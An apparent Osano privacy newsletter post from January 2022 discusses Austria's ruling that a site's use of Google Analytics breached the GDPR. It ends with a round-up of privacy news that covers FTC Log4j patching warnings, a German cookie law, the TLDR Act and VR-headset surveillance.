TikTok Sues Montana
Hello all, and happy Thursday!Read Now
The simple, all-in-one data privacy platform
Manage consent for data privacy laws in 50+ countries
Streamline the DSAR workflow
Ensure your customers’ data is in good hands
Gain insights with privacy assessment templates and workflow management
Discover how Osano supports CPRA compliance
Learn about the CCPA and how Osano can help
Achieve compliance with one of the world’s most comprehensive data privacy laws
Don’t let data privacy compliance get in the way of growth
Preserve your competitive edge
Manage data privacy at scale
Expert insights on all things privacy
Subscribe and become a Privacy Insider
Research the most essential privacy topics
We'll scan your website for privacy risk at no cost
The Osano story
Become an Osanian and help us build the future of privacy!
We’re eager to hear from you
No fines, no penalties
Add Osano data privacy ratings and recommendations to your application
Fresh duds for data privacy fans
January 14, 2022
There are no doubt some important conversations happening inside board rooms today after the decision by Austria's data protection authority that a website's use of Google Analytics is illegal under the GDPR.
The regulator said that a heath-focused website in the country, which was transferring IP address data to the U.S. via Google Analytics, violated the law.
Google Analytics is a widely used tool to help organizations understand how visitors use their sites and apps. Google says the tool is never used to track people across sites or apps and that customers are prohibited from uploading information that could be used to identify a person. But the Austrian DPA said IP addresses, combined with other data, could ostensibly identify a person and therefore is personal data.
A little context: Europe is very worried about U.S. authorities' access to EU citizens' data. That's the reason, in general, that the EU government shut down the Safe Harbor Framework in 2015 and then did the same to its successor, Privacy Shield.
The drama began when Max Schrems, a Facebook user, sent an inquiry to the company asking about his personal data. Dissatisfied by the company's practices, he asked the Irish Data Protection Commission to investigate the case. This happened after the Snowden revelations, and Schrems was concerned that U.S. intelligence agencies could access his personal data. That's because there are U.S. laws that allow law enforcement to access information it otherwise wouldn't have access to in the name of fighting crimes.
We call Schrems I the case that resulted in Safe Harbor's demise. With Schrems II, Privacy Shield dissolved.
Both cases were hugely problematic from U.S. companies using the frameworks to export data out of the EU legally.
This decision by Austria's regulator follows the same European concerns: that data stored in the U.S. doesn't protect EU citizens the way the GDPR does. That's a big problem because if you've ever been to a Congressional hearing on Section 702 of the FISA Act, the provision that allows law enforcement such access, the FBI and the NSA aren't interested in giving up that power. They say it's essential in thwarting crimes. Much of law enforcement's work under 702 is classified, however, so it's never exactly clear how impactful having broad access to data has been in solving crimes.
The implications of this Austrian case aren't yet clear. I asked Twitter what people are thinking and what kind of conversations organizations using Google Analytics are having. This response was pretty good, I thought:
"Has anyone been in touch with IT yet?"— Christopher Schmidt (@PiracyByDesign) January 14, 2022
"Where is our DPO when we need it?"
"How do you install that weird @matomo_org thing again?" pic.twitter.com/GvxZxrEMdd
For its part, Google released a statement explaining analytics and saying, in part, that it applies numerous safety measures to protect data transferred outside of the EU. "Our infrastructure and encryption is designed to protect data and safeguard it from any government access."
What's a company to do? I don't know yet. But as this story plays out, I'll keep you updated. I promise!
For now, enjoy a round-up of this week's major privacy news, and I'll see you next week!
Austrian data protection authority rules site's use of Google Analytics violates GDPR
Austria’s data protection authority has found that a website using Google Analytics (and thus exporting its visitors’ data to the U.S.) violated the EU’s GDPR. The regulator said the IP addresses are considered personal data. Despite Google’s assertion that it implemented protections for data, such as such as encryption-at-rest in its data centers, the Austrian regulator said he did not find “sufficient safeguards had been put in place to effectively block U.S. intelligence services from accessing the data, as required to meet the GDPR’s standard,” TechCrunch reports.
FTC threatens to enforce again organizations that neglect to patch Log4j
On Dec. 9, a vulnerability in Log4j disrupted organizations around the globe. A vulnerability in the widely used logging tool for the popular Java programing language allowed attackers to remotely gain control of a device or system using the utility. It’s been over a month, but “the crisis shows no sign of abating,” Brookings Institution reports. Because the U.S. doesn’t have broad rules on how to handle the risk, the Federal Trade Commission has told companies they have a legal duty to take “reasonable steps to mitigate.” It also threatened to come down on companies that fail to do so, citing its $700 million settlement with Equifax in 2017 when it failed to patch a known security risk.
German telecom law contains new rules on tracking cookies
On Dec. 1, 2021, Germany passed the Telecommunications-Telemedia Data Protection Act. The law regulates services like email and messaging services and codifies into national law that organizations deploying tracking technologies must gain consent – regardless of whether the data is processed. Here’s what you need to know about how the rule applies to cookies.
US lawmakers introduce TLDR Act
The Washington Post reports that a bipartisan group of lawmakers has introduced legislation that would require websites to make their terms of service agreements easy for users to digest. There’s plenty of data suggesting users don’t read a website’s terms before agreeing to them. They’re long and filled with legalese. But the TLDR Act would require sites to display a “summary statement” that not only discloses their terms in an “easy to understand” manner but also whether they’ve had a data breach recently and what sensitive personal data they collect.”
VR headsets are fun, but could help your employer spy ... so
The Washington Post reports on virtual reality headsets, which pundits say will become part of everyday working life within the next few years. But a headset can collect more data about the person wearing it than the average computer screen can, which gives “companies more opportunities to take and share that data for profiling and advertising.” The Washington Post reports that it could provide both employers and the government the ability to monitor behavior.
Upcoming webinar: How to build a privacy program
It can be a daunting task to be assigned "privacy" at your organization. Depending on the resources and budget your company is willing to spend, there's not a one-size-fits-all checklist to follow. But there are steps you can take – whether you're an office of one or at a later stage on the privacy maturity spectrum – toward building a sophisticated and agile privacy program. This free webinar features three privacy experts who've built their own programs to give you some concrete strategies and actions items you can take whether you're a beginner or advanced.
Register for Webinar
Writer at Osano
Writer at Osano
The Osano staff is a diverse team of free thinkers who enjoy working as part of a distributed team with the common goal of working to make a more transparent internet. Occasionally, the team writes under the pen name of our mascot, “Penny, the Privacy Pro.”
Osano is used by the world's most innovative and forward-thinking companies to easily manage and monitor their privacy compliance.
Osano makes it easy. Ready to get serious about data privacy? Choose your plan and get started. All plans come with a 30-day FREE trial!